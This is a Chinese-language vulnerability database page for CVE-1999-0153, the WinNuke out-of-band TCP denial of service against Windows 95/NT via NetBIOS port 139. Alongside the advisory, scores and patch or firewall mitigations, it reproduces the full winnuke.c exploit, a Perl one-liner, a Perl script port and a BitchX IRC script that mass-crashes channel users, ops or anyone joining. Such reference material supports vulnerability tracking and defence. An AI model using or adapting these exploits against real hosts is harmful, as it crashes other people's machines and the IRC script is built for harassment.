CVE-1999-0153
CVSS5.0
发布时间 :1997-07-01 00:00:00
修订时间 :2008-09-09 08:33:52
NMCOE    

[原文]Windows 95/NT out of band (OOB) data denial of service through NETBIOS port, aka WinNuke.


[CNNVD]早期Windows系统TCP/IP OOB带外紧急数据拒绝服务攻击漏洞(CNNVD-199707-008)

        
        TCP/IP网络协议栈是大多数操作系统均实现的用于Internet联网的最被广为使用的网络协议。
        一些老版本的Windows系统不能很好的处理TCP紧急数据,远程攻击者可以利用此漏洞对服务器进行拒绝服务攻击,造成主机系统崩溃。
        1997年5月7号有人发布了一个winnuke.c。首先建立一条到Win95/NT主机的TCP连接,然后发送TCP紧急数据,导致系统崩溃。139/TCP是Win95/NT系统最常见的侦听端口,所以winnuke.c使用了该端口。之所以称呼这种攻击为OOB攻击,因为MSG_OOB标志,实际应该是TCP紧急数据攻击。
        <*链接:http://xforce.iss.net/static/173.php
         http://www.ciac.org/ciac/bulletins/h-57.shtml
        *>

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_2000Microsoft Windows 2000
cpe:/o:sco:openserver:5.0
cpe:/o:microsoft:windows_95Microsoft Windows 95
cpe:/o:microsoft:windows_ntMicrosoft Windows NT

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0153
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0153
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199707-008
(官方数据源) CNNVD

- 其它链接及资源

http://www.osvdb.org/1666
(UNKNOWN)  OSVDB  1666

- 漏洞信息

早期Windows系统TCP/IP OOB带外紧急数据拒绝服务攻击漏洞
中危 未知
1997-07-01 00:00:00 2005-05-02 00:00:00
远程  
        
        TCP/IP网络协议栈是大多数操作系统均实现的用于Internet联网的最被广为使用的网络协议。
        一些老版本的Windows系统不能很好的处理TCP紧急数据,远程攻击者可以利用此漏洞对服务器进行拒绝服务攻击,造成主机系统崩溃。
        1997年5月7号有人发布了一个winnuke.c。首先建立一条到Win95/NT主机的TCP连接,然后发送TCP紧急数据,导致系统崩溃。139/TCP是Win95/NT系统最常见的侦听端口,所以winnuke.c使用了该端口。之所以称呼这种攻击为OOB攻击,因为MSG_OOB标志,实际应该是TCP紧急数据攻击。
        <*链接:http://xforce.iss.net/static/173.php
         http://www.ciac.org/ciac/bulletins/h-57.shtml
        *>

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 关闭外网对于TCP/139及TCP/445端口的访问
        如果不需要向外提供Windows共享等服务,则在防火墙上阻塞外部对内的TCP/139及TCP/445端口的访问。
        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了相应补丁:
        补丁下载:
        Microsoft Windows 95
        
        http://support.microsoft.com/default.aspx?scid=
        http://download.microsoft.com/download/win95upg/patch1/1/w95/EN-US/vtcpupd.exe

        Microsoft Windows NT
        安装SP4以上版本的service pack,或者在这里下载补丁:
        ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40/hotfixes-postSP3/teardrop2-fix/

- 漏洞信息 (20437)

Windows 3.11/95/NT 4.0/NT 3.5.1 "Out Of Band" Data Denial Of Service (1) (EDBID:20437)
windows dos
1997-07-05 Verified
0 _eci
N/A [点击下载]
source: http://www.securityfocus.com/bid/2010/info

Older versions of Microsoft Windows (95, Windows for Workgroups 3.11, Windows NT up to and including 4.0), as well as SCO Open Server 5.0, have a vulnerability relating to the way they handle TCP/IP "Out of Band" data.

According to Microsoft, "A sender specifies "Out of Band" data by setting the URGENT bit flag in the TCP header. The receiver uses the URGENT POINTER to determine where in the segment the urgent data ends. Windows NT bugchecks when the URGENT POINTER points to the end of the frame and no normal data follows. Windows NT expects normal data to follow. "

As a result of this assumption not being met, Windows gives a "blue screen of death" and stops responding.

Windows port 139 (NetBIOS) is most susceptible to this attack. although other services may suffer as well. Rebooting the affected machine is required to resume normal system functioning. 

/*
        It is possible to remotely cause denial of service to any windows
95/NT user.  It is done by sending OOB [Out Of Band] data to an
established connection you have with a windows user.  NetBIOS [139] seems
to be the most effective since this is a part of windows.  Apparently
windows doesn't know how to handle OOB, so it panics and crazy things
happen.  I have heard reports of everything from windows dropping carrier
to the entire screen turning white.  Windows also sometimes has trouble
handling anything on a network at all after an attack like this.  A
reboot fixes whatever damage this causes.  Code follows.


--- CUT HERE ---
*/
/* winnuke.c - (05/07/97)  By _eci  */
/* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */


#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

#define dport 139  /* Attack port: 139 is what we want */

int x, s;
char *str = "Bye";  /* Makes no diff */
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;


int open_sock(int sock, char *server, int port) {
     struct sockaddr_in blah;
     struct hostent *he;
     bzero((char *)&blah,sizeof(blah));
     blah.sin_family=AF_INET;
     blah.sin_addr.s_addr=inet_addr(server);
     blah.sin_port=htons(port);


    if ((he = gethostbyname(server)) != NULL) {
        bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
    }
    else {
         if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
           perror("gethostbyname()");
           return(-3);
         }
    }

        if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
             perror("connect()");
             close(sock);
             return(-4);
        }
        printf("Connected to [%s:%d].\n",server,port);
        return;
}


void main(int argc, char *argv[]) {

     if (argc != 2) {
       printf("Usage: %s <target>\n",argv[0]);
       exit(0);
     }

     if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
        perror("socket()");
        exit(-1);
     }

     open_sock(s,argv[1],dport);


     printf("Sending crash... ");
       send(s,str,strlen(str),MSG_OOB);
       usleep(100000);
     printf("Done!\n");
     close(s);
}

/*

		

- 漏洞信息 (20438)

Windows 3.11/95/NT 4.0/NT 3.5.1 "Out Of Band" Data Denial Of Service (2) (EDBID:20438)
windows dos
1997-05-07 Verified
0 _eci
N/A [点击下载]
source: http://www.securityfocus.com/bid/2010/info
 
Older versions of Microsoft Windows (95, Windows for Workgroups 3.11, Windows NT up to and including 4.0), as well as SCO Open Server 5.0, have a vulnerability relating to the way they handle TCP/IP "Out of Band" data.
 
According to Microsoft, "A sender specifies "Out of Band" data by setting the URGENT bit flag in the TCP header. The receiver uses the URGENT POINTER to determine where in the segment the urgent data ends. Windows NT bugchecks when the URGENT POINTER points to the end of the frame and no normal data follows. Windows NT expects normal data to follow. "
 
As a result of this assumption not being met, Windows gives a "blue screen of death" and stops responding.
 
Windows port 139 (NetBIOS) is most susceptible to this attack. although other services may suffer as well. Rebooting the affected machine is required to resume normal system functioning. 

perl -MIO::Socket -e 'IO::Socket::INET->new(PeerAddr=>"some.windoze.box:139")->send("bye",MSG_OOB)'
		

- 漏洞信息 (20439)

Windows 3.11/95/NT 4.0/NT 3.5.1 "Out Of Band" Data Denial Of Service (3) (EDBID:20439)
windows dos
1997-05-07 Verified
0 _eci
N/A [点击下载]
source: http://www.securityfocus.com/bid/2010/info
  
Older versions of Microsoft Windows (95, Windows for Workgroups 3.11, Windows NT up to and including 4.0), as well as SCO Open Server 5.0, have a vulnerability relating to the way they handle TCP/IP "Out of Band" data.
  
According to Microsoft, "A sender specifies "Out of Band" data by setting the URGENT bit flag in the TCP header. The receiver uses the URGENT POINTER to determine where in the segment the urgent data ends. Windows NT bugchecks when the URGENT POINTER points to the end of the frame and no normal data follows. Windows NT expects normal data to follow. "
  
As a result of this assumption not being met, Windows gives a "blue screen of death" and stops responding.
  
Windows port 139 (NetBIOS) is most susceptible to this attack. although other services may suffer as well. Rebooting the affected machine is required to resume normal system functioning. 

#!/usr/bin/perl

# Ghent - ghent@bounty-hunters.com - Perl version of winnuke.c by _eci

use strict; use Socket;

my($h,$p,$in_addr,$proto,$addr);

$h = "$ARGV[0]"; $p = 139 if (!$ARGV[1]);
if (!$h) { print "A hostname must be provided. Ex: www.microsoft.com\n"; }

$in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr);
$proto = getprotobyname('tcp');
socket(S, AF_INET, SOCK_STREAM, $proto) or die $!;

connect(S,$addr) or die $!; select S; $| = 1; select STDOUT;

print "Nuking: $h:$p\n"; send S,"Sucker",MSG_OOB; print "Nuked!\n"; close S;

		

- 漏洞信息 (20440)

Windows 3.11/95/NT 4.0/NT 3.5.1 "Out Of Band" Data Denial Of Service (4) (EDBID:20440)
windows dos
1997-05-07 Verified
0 maddog and lerper
N/A [点击下载]
source: http://www.securityfocus.com/bid/2010/info
   
Older versions of Microsoft Windows (95, Windows for Workgroups 3.11, Windows NT up to and including 4.0), as well as SCO Open Server 5.0, have a vulnerability relating to the way they handle TCP/IP "Out of Band" data.
   
According to Microsoft, "A sender specifies "Out of Band" data by setting the URGENT bit flag in the TCP header. The receiver uses the URGENT POINTER to determine where in the segment the urgent data ends. Windows NT bugchecks when the URGENT POINTER points to the end of the frame and no normal data follows. Windows NT expects normal data to follow. "
   
As a result of this assumption not being met, Windows gives a "blue screen of death" and stops responding.
   
Windows port 139 (NetBIOS) is most susceptible to this attack. although other services may suffer as well. Rebooting the affected machine is required to resume normal system functioning. 

# WinNuke BitchX IRC script/wnuke package v 1.5
# Created by maddog and lerper
# maddog@bitsmart.com, lerper@bitsmart.com

#      WinNuke IRCers with several options:
#      the nick you define
#      all of the ops in your current channel
#      anyone who joins a channel
#      everyone in the channel

# Creditz:
# goes out to _eci for winnuke
# #BitchX for their great support
# #ircII for pretending to be asleep whenever i asked for help
# #hack for the laughs (hey--they were talking about vibrators last night)
# Micro$oft for hosting the hacking channels on comic chat
# KL and his LPLC LAX
# shout outs to the L0pht and hey to memebers of  "CdC"

# notice: this package was created so more people could learn about winnuke
# and more winblows users could patch themeslves up.
# NOT so lame ircers could have their kicks

#Before using this script, compile the included winnuke.c
#cc -owinnuke winnuke.c should do the job!
#If you have a GNU compiler...replace the cc with gcc
#Then move the executable into your /usr/local/bin directory and
#chmod it with the access levels you wish.

assign wnuke_pgm wnuke
assign wn [wnuke w/ mass nuke features]
assign wi [winnuke commands]
eval echo $wn version 1.5 loading... [ by: maddog and the lerper ]
eval echo $wn type /whelp for commands

alias whelp {
  eval echo $wi /wnuke <nick> - sends a win nuke to someone
  eval echo $wi /mwnuke - sends a win nuke to everyone on a chan
  eval echo $wi /awnuke - when someone joins, it nukes them too, effective
with
mwnuke
  eval echo $wi /opwnuke - sends a win nuke to all ops
}

alias wnuke {
   if ([$0]) {
      ^on ^311 "*" {^assign ndomain $3}
      ^on ^319 "*" #
      ^whois $0
      wait
      EVAL ^exec winnuke $1 $ndomain >/dev/null &
      echo [wnuke] sent wnuke to $0 at $ndomain requested\.
      ^on 311 - "*"
      ^on 319 - "*"
      ^assign -ndomain
   }
   {
      echo
      echo Usage: /wnuke <nick>
   }
}
/on -join * {@joinvar=[$0]}
alias awnuke { /on -join * {/wnuke $0}}
alias mwnuke { fe ($chanusers()) blah { /wnuke $blah }}
alias opwnuke { fe ($chops()) blah { /wnuke $blah }}
		

- 漏洞信息

1666
Multiple Vendor Out Of Band Data Handling Remote DoS (WinNuke)
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

Microsoft Windows and SCO Open Server contain a flaw that may allow a remote denial of service. The issue is triggered when an out-of-band packet is sent to port 139, and will result in loss of availability for the platform.

- 时间线

1997-05-07 Unknow
1997-05-07 Unknow

- 解决方案

Microsoft and SCO have released a patch to address this vulnerability. Additionally, it is possible to mitigate this attack by implementing the following workaround: filter all traffic to TCP Port 139.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站